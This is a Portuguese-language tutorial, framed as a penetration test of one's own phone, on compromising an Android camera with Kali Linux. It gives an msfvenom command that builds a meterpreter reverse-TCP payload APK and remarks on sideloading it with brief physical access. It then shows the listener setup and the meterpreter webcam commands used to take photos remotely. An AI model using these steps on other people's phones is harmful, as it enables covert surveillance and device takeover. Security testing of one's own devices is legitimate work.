Houve várias histórias de hackers sequestrando câmeras de telefones Android para espionar seus usuários ou fornecer-lhes imagens falsas. Como proprietário de um telefone de alerta, você pode querer evitar isso avaliando a probabilidade e os riscos reais de tal evento de ameaça.
Kali Linux é uma das melhores ferramentas para verificar as vulnerabilidades potenciais da câmera do seu telefone Android por meio de um teste de penetração. Ele pode ajudá-lo a ficar por dentro de qualquer tentativa de hacker de acessar remotamente a câmera do telefone.
Instalando um Exploit Payload
Para usar o Kali Linux para um teste de penetração, primeiro baixe-o de seu site oficial. Consulte este tutorial anterior para obter as definições de vários jargões, como “msfvenom,” “msfconsole,” “meterpreter” e mais que serão usados neste exercício.
A primeira etapa do teste de penetração é instalar uma carga útil de exploração padrão no dispositivo. Para isso, abra o terminal Kali Linux e digite o seguinte comando: ifconfig
. Isso fornecerá o endereço IP da sua sessão Kali Linux.
Agora digite o comando mostrado abaixo usando o endereço IP acima. O número da porta para exploits, trojans e outras vulnerabilidades é geralmente fornecido como 4444.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk
Nesta etapa, tente injetar uma carga útil metasploit, que é baseada em um interpretador Java. Se for bem-sucedido, o teste de penetração o ajudará a verificar se o seu telefone está vulnerável a alguém que está ouvindo chamadas, acessando SMS, geo-localização do usuário, etc.
Nesse caso, a tentativa é mostrar como o exploit pode ser potencialmente usado para acessar as câmeras do telefone.

Assim que a exploração for iniciada, um arquivo APK chamado “Payload” será instalado na pasta raiz. Você precisa instalá-lo em um telefone Android de destino. No entanto, é mais fácil falar do que fazer. A maioria dos telefones e e-mails Android mais recentes se recusará a transportar esses arquivos infectados por malware, e isso é uma coisa boa.
No entanto, isso ainda pode ser feito por meio de um cabo USB ou arquivos temporários. Se um hacker tiver acesso ao seu telefone por alguns minutos, isso o torna um tanto vulnerável. Nosso esforço aqui neste teste de penetração é determinar a extensão precisa do risco envolvido.

Depois de transferido, você precisa encontrar uma maneira de instalar o arquivo de carga útil em seu telefone. A menos que seja uma versão muito antiga do Android, seu telefone deve emitir vários avisos antes que o APK possa ser instalado. Ainda assim, não importa a versão do telefone Android, existem muitas outras maneiras de instalar aplicativos de fontes desconhecidas em um telefone Android.

Lançando o Exploit
Para iniciar a exploração do Payload acima, insira o seguinte comando: msfconsole
. Levará apenas alguns segundos para que o comando seja executado, e o metasploit pode ser preparado para mais testes de penetração nas câmeras do telefone.

O metasploit dará sua própria descrição completa. O resumo da carga útil também está visível. Mostra o número de exploits em ação.

Na próxima etapa, o msfconsole está pronto para iniciar o exploit. Para isso, consulte o endereço IP e o número da porta (4444) discutidos anteriormente. Assim, digite os seguintes comandos:
exploit (multi/handler) > set LHOST "IP Address" [ENTER] set LPORT "Port number" [ENTER] exploit [ENTER]

Quando o manipulador TCP reverso for ativado, você verá vários estágios do Meterpreter sendo inicializado. Aguarde alguns segundos enquanto ele diagnostica o telefone de destino.
Deve ser mencionado aqui que a maioria dos telefones Android modernos continuará a negar esse acesso. Lembre-se de que este é um teste de penetração. Se o seu telefone Android não puder ser invadido usando este arquivo APK letal, isso significa que o fabricante do seu telefone está ciente desse vetor de ataque específico.

Acessando a câmera do telefone Android
Se você conseguiu inserir o exploit no telefone, existe uma chance de que agora ele possa ser penetrado. Quando isso acontecer, o “meterpreter” em um terminal Kali Linux será capaz de estabelecer uma conexão com o telefone. Neste ponto, insira help
para acessar várias opções no telefone Android sob ataque.

Insira os seguintes comandos (do menu de ajuda) para acessar as câmeras do seu telefone. Nesta exploração, houve uma tentativa de acessar a câmera traseira para tirar fotos do terminal.
webcam_list [ENTER] 1. Back camera 2. Front camera [ENTER] webcam_stream -i 1
Para completar um teste de penetração bem-sucedido, assim que puder acessar a câmera, tire uma foto e salve-a na pasta raiz do Kali Linux. Você também pode editar, renomear ou excluir as outras fotos armazenadas. Portanto, qualquer penetração bem-sucedida no telefone testado é um alerta sobre a probabilidade de um ataque real, o que significa que é hora de fazer um patch de segurança.

Neste tutorial, você aprendeu como uma câmera Android pode ser acessada de um terminal Kali Linux para teste de penetração.
Este é um artigo de pesquisa de segurança. Se você estiver acessando a câmera de outra pessoa para uma demonstração, sempre obtenha permissão primeiro – a menos, é claro, que seja o seu próprio telefone. Não se esqueça de verificar esses aplicativos de hacking para Android para ajudá-lo a testar e encontrar vulnerabilidades em seu telefone
Relacionado: